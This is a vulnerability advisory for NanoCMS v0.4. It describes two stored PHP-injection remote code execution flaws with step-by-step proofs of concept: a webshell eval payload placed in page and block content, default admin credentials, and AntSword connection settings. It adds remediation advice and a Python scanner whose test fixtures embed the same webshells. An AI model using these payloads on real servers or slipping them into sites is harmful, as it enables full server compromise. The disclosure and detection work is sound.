Vulnerability Report: NanoCMS v0.4 Multiple Critical Vulnerabilities

  1. Vulnerability Overview

Product: NanoCMS
Version: v0.4 (last official release: 2009; discontinued)
Vendor: Kalyan Chakravarthy (project discontinued)
Vulnerabilities:

  • Unauthenticated Remote Code Execution (RCE) via Unsanitized Content Input
  • Unrestricted File Inclusion (UFI) via User-Controlled Path Variables

  2. Vulnerability 1: Unauthenticated Remote Code Execution

CVE Candidate Type: Remote Code Execution (CWE-94)
CVSS v3.1 Base Score: 9.8 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

NanoCMS v0.4 fails to sanitize user-supplied content when creating/editing pages. Attackers can inject arbitrary PHP code (e.g., <?php @eval($_POST['cmd']); ?>) into page content via the admin panel (or unauthenticated endpoints, if access controls are weak). When the affected page is rendered (e.g., via index.php?page=1), the injected code executes with the privileges of the web server process.

Proof of Concept (PoC)

  1. Access the NanoCMS admin panel (/data/nanoadmin.php) (default credentials: admin/demo).
  2. Create a new page (or edit an existing one) and insert the following payload into the “Content” field:

         <?php @eval($_POST['cmd']); ?>

  3. Save the page (assign it a slug, e.g., page=1).
  4. Send a POST request to the affected page URL (http://localhost:777/index.php?page=1) with the cmd parameter containing arbitrary system commands.
  5. Configure the AntSword tool with the following connection details:
     • Target URL: http://localhost:777/index.php?page=1
     • Connection Password (webshell parameter): cmd
     • Encoding: base64
     • Connection Type: PHP

Test the connection: AntSword establishes a session and gains control of the server filesystem, confirming the RCE vulnerability.

  3. Vulnerability 2: RCE via Unsanitized Block Content

CVSS v3.1 Base Score: 9.8 (Critical)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Beyond page content, NanoCMS v0.4’s “Blocks” content editing feature also fails to filter PHP code. Attackers can inject malicious code into block content; when the block is rendered on any page (e.g., the homepage), the code executes, triggering a second RCE vulnerability.

Proof of Concept (PoC)

  1. In the admin panel, access the “Block Management” feature.
  2. Create/edit any block, and insert the same PHP webshell into the block content:

         <?php @eval($_POST['cmd']); ?>

  3. Associate the block with the website homepage (e.g., the “below navigation” section).
  4. Configure AntSword with the homepage URL (index.php?page=home) and the same connection parameters: a successfully established session and command execution confirm the second RCE vulnerability.

  4. Impact

Both RCE vulnerabilities allow attackers to:

  • Fully compromise the web server and execute arbitrary system commands;
  • Read/modify any files on the server;
  • Pivot to internal network environments for further lateral movement.

  5. Remediation

NanoCMS v0.4 is discontinued, with no official patches available. Mitigation steps:

  • Immediately discontinue use of NanoCMS v0.4 and migrate to a maintained CMS;
  • If unavoidable:
    • Restrict admin panel access (IP whitelisting + strong passwords);
    • Force-filter PHP tags from all user input (e.g., using PHP’s strip_tags() function; note that strip_tags() also removes HTML markup unless an allow-list of tags is passed);
    • Disable dangerous PHP functions (e.g., eval()) in php.ini (note that disable_functions covers internal functions such as system() and shell_exec(), whereas eval() is a language construct and is not affected by that setting).
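Because the stored content itself is the attack artifact in both vulnerabilities, an operator keeping such an install should also check whether page or block content has already been tampered with. The scanner below is an added example written for this report, not NanoCMS code or the original advisory's; it assumes that page and block content is stored as plain HTML/text files under the site's data directory (the directory layout and file names it builds are constructed for the demonstration), so any PHP open tag or request-driven code sink inside such a file is reported.

```python
import re
import tempfile
from pathlib import Path

# Assumption (not from the advisory): stored page/block content is plain HTML/text,
# so a PHP open tag or a code sink fed by request input inside it is a finding.
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=|\s)", re.IGNORECASE)
CODE_SINK_ON_REQUEST = re.compile(
    r"@?\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)"
    r"\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)

def scan_content(text):
    """Return [(line_no, reason, line)] for one stored content blob."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if PHP_OPEN_TAG.search(line):
            findings.append((no, "php-open-tag", line.strip()))
        if CODE_SINK_ON_REQUEST.search(line):
            findings.append((no, "code-sink-on-request-input", line.strip()))
    return findings

def scan_directory(root):
    """Map relative file path -> findings for every flagged file under root."""
    root = Path(root)
    results = {}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        findings = scan_content(path.read_text(errors="replace"))
        if findings:
            results[path.relative_to(root).as_posix()] = findings
    return results

def build_sample_site():
    """Create a constructed data directory: one injected page, one clean page, one injected block."""
    root = Path(tempfile.mkdtemp(prefix="nanocms-scan-"))
    (root / "pages").mkdir()
    (root / "blocks").mkdir()
    # page 1: the advisory's webshell appended to ordinary HTML
    (root / "pages" / "1.txt").write_text("<h1>Welcome</h1>\n<?php @eval($_POST['cmd']); ?>\n")
    # about page: clean; the XML declaration must not be reported as a PHP tag
    (root / "pages" / "about.txt").write_text('<?xml version="1.0"?>\n<p>About us</p>\n')
    # block: short echo-tag variant of the same injection
    (root / "blocks" / "nav.txt").write_text("<ul><li>Home</li></ul><?= system($_GET['c']) ?>\n")
    return str(root)

if __name__ == "__main__":
    for rel, findings in scan_directory(build_sample_site()).items():
        for no, reason, line in findings:
            print(f"{rel}:{no}: {reason}: {line}")
```

Point scan_directory() at the real data directory of an install to review it; a hit on an open tag in content that should be pure HTML is a strong indicator of the injection described above.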

  6. Disclosure Timeline

  • [2026.1.22]: Identified both RCE vulnerabilities;
  • [2026.1.22]: Attempted vendor contact (project terminated, no response);
  • [2026.1.22]: Submitted CVE request.

Reporter: [tubby]